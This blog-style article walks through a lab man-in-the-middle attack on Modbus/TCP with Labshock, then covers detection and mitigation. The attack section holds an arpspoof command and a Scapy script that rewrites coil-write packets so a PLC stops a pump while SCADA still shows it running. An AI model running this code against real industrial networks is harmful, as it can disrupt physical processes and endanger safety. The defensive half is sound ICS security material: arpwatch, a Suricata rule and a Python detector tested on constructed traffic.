Modbus MITM Attack with Labshock: Fooling SCADA Systems

In this article, we explore a real-world Man-in-the-Middle (MITM) attack on the Modbus protocol using Labshock v1.5, demonstrating how an attacker can manipulate SCADA systems while remaining undetected by operators and intrusion detection systems (IDS).

Attack Overview

  • SCADA displays a pump as running, but the PLC receives a stop command.
  • The operator remains unaware, while alarms (e.g., low pressure) trigger without a visible cause.
  • No alerts are generated, making detection difficult without proper tools.

Step-by-Step Attack Execution

1. Lab Setup

  • Deploy SCADA, PLC, Pentest Station, and IDS in a controlled environment.
  • Ensure Modbus/TCP communication is active.

2. Normal Operation Test

  • Verify pump control via SCADA. Sample Modbus read/write commands (using mbpoll):
    mbpoll -a 1 -t 0 -r 0 -c 1 192.168.1.10      # read coil status (unit 1, coil table, reference 0, 1 coil)
    mbpoll -a 1 -t 0 -r 0 -c 1 192.168.1.10 0    # write 0 ("stop") to the same coil

3. Launch MITM Attack

  • ARP Spoofing: Redirect traffic between SCADA and PLC:
    arpspoof -i eth0 -t 192.168.1.1 192.168.1.10   # SCADA -> PLC

  • Modbus Packet Manipulation: Use Python (Scapy) to alter coil writes:
    from scapy.all import *

    def modbus_mitm(pkt):
        # only Modbus/TCP traffic towards the PLC (server port 502)
        if pkt.haslayer(TCP) and pkt.dport == 502:
            # detect a Write Single Coil request (function code 0x05)
            if Raw in pkt and b"\x05\x00" in pkt[Raw].load:
                # rewrite the coil value ON (0xFF00) to OFF (0x0000), forcing "stop"
                pkt[Raw].load = pkt[Raw].load.replace(b"\xFF\x00", b"\x00\x00")
                sendp(pkt, iface="eth0")

    sniff(filter="tcp port 502", prn=modbus_mitm)

4. Observe Impact

  • SCADA logs show “pump running”, but PLC executes “stop”.
  • Operator sees no anomalies until process alarms trigger.

You Should Know: Detection & Mitigation

  • Network Monitoring: Detect ARP spoofing with arpwatch:
    arpwatch -i eth0   # log and alert on changes to IP/MAC pairings

  • Encrypted Modbus (Modbus/TCP Security, i.e. Modbus over TLS): Prevents packet manipulation, since TLS authenticates and integrity-protects the session.
  • Anomaly Detection: Use tools like Suricata with custom ICS rules, for example alerting on Write Single Coil (function code 0x05) requests:
    alert modbus any any -> any 502 (msg:"Modbus coil overwrite"; content:"|05 00|"; sid:10001; rev:1;)
  • Physical Segregation: Isolate OT networks from IT.
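The two monitoring controls above (an arpwatch-style IP/MAC change check and a Modbus coil-write alert) can be shown working together on constructed sample traffic. The block below is an added example written for this article, not code from the original post or from Labshock; it also shows the Modbus/TCP framing that the mbpoll commands in step 2 put on the wire. A plain `content:"|05 00|"` match fires on that byte pair anywhere in the payload, so the parser here reads the function code at its real offset (byte 7 of the ADU, right after the 7-byte MBAP header) and decodes the coil value, distinguishing an ON write (0xFF00) from an OFF write (0x0000). All IPs, MACs and frames are constructed sample data.

```python
import struct

MBAP_LEN = 7                   # Modbus/TCP MBAP header: tid(2) pid(2) len(2) unit(1)
FC_READ_COILS = 0x01
FC_WRITE_SINGLE_COIL = 0x05


def detect_arp_changes(arp_records):
    """arpwatch-style check: return an alert for every IP whose MAC changes.

    arp_records is a list of (ip, mac) pairs in the order they were observed.
    """
    table, alerts = {}, []
    for ip, mac in arp_records:
        mac = mac.lower()
        prev = table.get(ip)
        if prev is not None and prev != mac:
            alerts.append(f"ARP change: {ip} moved from {prev} to {mac}")
        table[ip] = mac
    return alerts


def parse_modbus_tcp(adu):
    """Parse a Modbus/TCP ADU into its fields; return None if it is malformed."""
    if len(adu) < MBAP_LEN + 1:
        return None
    tid, pid, length, unit = struct.unpack(">HHHB", adu[:MBAP_LEN])
    # protocol id is always 0; the length field counts unit id + PDU (everything after byte 6)
    if pid != 0 or length != len(adu) - 6:
        return None
    return {"tid": tid, "unit": unit, "fc": adu[7], "data": adu[8:]}


def coil_write_alert(adu):
    """Return an alert string for a Write Single Coil request, else None.

    Checks the function code at its real offset and decodes the coil value
    (FF00 = ON, 0000 = OFF; anything else is invalid per the Modbus spec).
    """
    frame = parse_modbus_tcp(adu)
    if frame is None or frame["fc"] != FC_WRITE_SINGLE_COIL or len(frame["data"]) != 4:
        return None
    addr, value = struct.unpack(">HH", frame["data"])
    state = {0xFF00: "ON", 0x0000: "OFF"}.get(value, f"invalid(0x{value:04X})")
    return f"Write Single Coil: unit={frame['unit']} coil={addr} value={state}"


def naive_content_match(adu):
    """What an unanchored content:"|05 00|" rule effectively tests: the byte pair anywhere."""
    return b"\x05\x00" in adu


def build_write_coil(tid, unit, addr, on):
    """Build a Write Single Coil request; used here only to construct sample frames."""
    pdu = struct.pack(">BHH", FC_WRITE_SINGLE_COIL, addr, 0xFF00 if on else 0x0000)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


# Constructed sample data (not captured from any real network).
SAMPLE_ARP = [
    ("192.168.1.10", "aa:bb:cc:00:00:10"),   # PLC
    ("192.168.1.1", "aa:bb:cc:00:00:01"),    # SCADA
    ("192.168.1.10", "de:ad:be:ef:00:99"),   # PLC IP now answered by a different MAC
]
SAMPLE_FRAMES = [
    build_write_coil(1, 1, 0, True),                 # operator starts the pump (coil 0 ON)
    build_write_coil(2, 1, 0, False),                # coil 0 written OFF
    bytes.fromhex("000300000006010100000001"),       # Read Coils: 1 coil from address 0
    bytes.fromhex("050000000006010100000001"),       # Read Coils whose tid happens to be 0x0500
]


def run_checks(arp_records=SAMPLE_ARP, frames=SAMPLE_FRAMES):
    """Run both checks over the sample traffic and return the combined alert list."""
    alerts = detect_arp_changes(arp_records)
    for adu in frames:
        alert = coil_write_alert(adu)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for line in run_checks():
        print(line)
    for adu in SAMPLE_FRAMES:
        print(adu.hex(), "naive |05 00| match:", naive_content_match(adu),
              "| parsed fc:", parse_modbus_tcp(adu)["fc"])
```

Running it prints one ARP alert for the PLC address and one coil-write alert for each of the two write frames; the last sample frame shows the difference between the two approaches, since the bare byte-pair match fires on its transaction id while the parser correctly reports it as a Read Coils request. In a real deployment the interesting signal is the OFF write reaching the PLC while the HMI still shows the pump running, which is exactly what an ICS-aware monitor correlating both sides of the conversation would surface.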

What Undercode Says

This attack highlights the critical risks in unsecured ICS protocols. While Modbus lacks encryption, compensating controls like network segmentation, anomaly detection, and protocol validation are essential. Red teams must simulate such attacks, while blue teams should deploy OT-specific IDS like Labshock or Nozomi Networks.

Expected Output:

  • A silent pump shutdown despite SCADA indicating normal operation.
  • No traditional IDS alerts, emphasizing the need for ICS-aware monitoring.

Reported By: Zakharb Otsiem – Hackers Feeds